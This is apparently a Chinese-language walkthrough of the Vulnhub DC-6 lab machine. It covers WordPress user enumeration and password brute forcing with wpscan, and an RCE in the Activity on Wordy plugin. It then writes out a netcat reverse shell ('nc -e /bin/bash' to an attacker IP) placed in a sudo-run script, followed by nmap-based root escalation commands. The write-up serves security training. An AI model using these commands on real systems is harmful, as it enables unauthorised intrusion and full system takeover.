Vulnhub_DC-6

Vulnhub提示:

Vulnhub_DC-6

扫描靶机IP地址:nmap -sP 192.168.10.0/24

Vulnhub_DC-6

扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129

Vulnhub_DC-6开放端口22,80

访问80端口发现URL被重定向到wordy

我们需要在host文件中添加

文件位置 /etc/hosts

Vulnhub_DC-6

可以访问到啦

Vulnhub_DC-6

扫描下目录结构吧,

御剑扫描

Vulnhub_DC-6

发现是wordpress站点

使用WPscan扫描

一款专注于wordpress站点扫描工具

wpscan -url wordy

Vulnhub_DC-6

顺便枚举一下用户

Vulnhub_DC-6站点没发现什么漏洞,暴力破解尝试下

root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt

破解很久没获取密码,这时候想起Vulnhub重要提示

root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

使用这个字典在尝试下暴力破解

root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt

获得密码

mark
helpdesk01

登录后台发现Activity on Wordy插件存在远程代码执行漏洞

 

Vulnhub_DC-6

利用远程代码执行命令漏洞步骤:

step1:打开burpsuite工具设置代理

Vulnhub_DC-6

step2:

Vulnhub_DC-6step3:发送到重写模块Vulnhub_DC-6

step4:kali打开端口监听

Vulnhub_DC-6step5:Vulnhub_DC-6利用成功获取到webshell

横向移动搜寻可以利用的信息

成功找到了graham的密码信息

Vulnhub_DC-6

查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本

Vulnhub_DC-6

如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell

Vulnhub_DC-6echo “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh

kali 端监听 8888 端口

Vulnhub_DC-6

sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的

Vulnhub_DC-6

jens用户可以以 root权限执行 nmap Vulnhub_DC-6nmap 提权分为两种

旧版本上以进入交互提权

# 进入nmap的交互模式
nmap --interactive
# 执行sh,提权成功
!sh

新版本

echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF

Vulnhub_DC-6Vulnhub_DC-6Vulnhub_DC-6

上一篇:Swoole Task 的应用


下一篇:Vulnhub-DC-6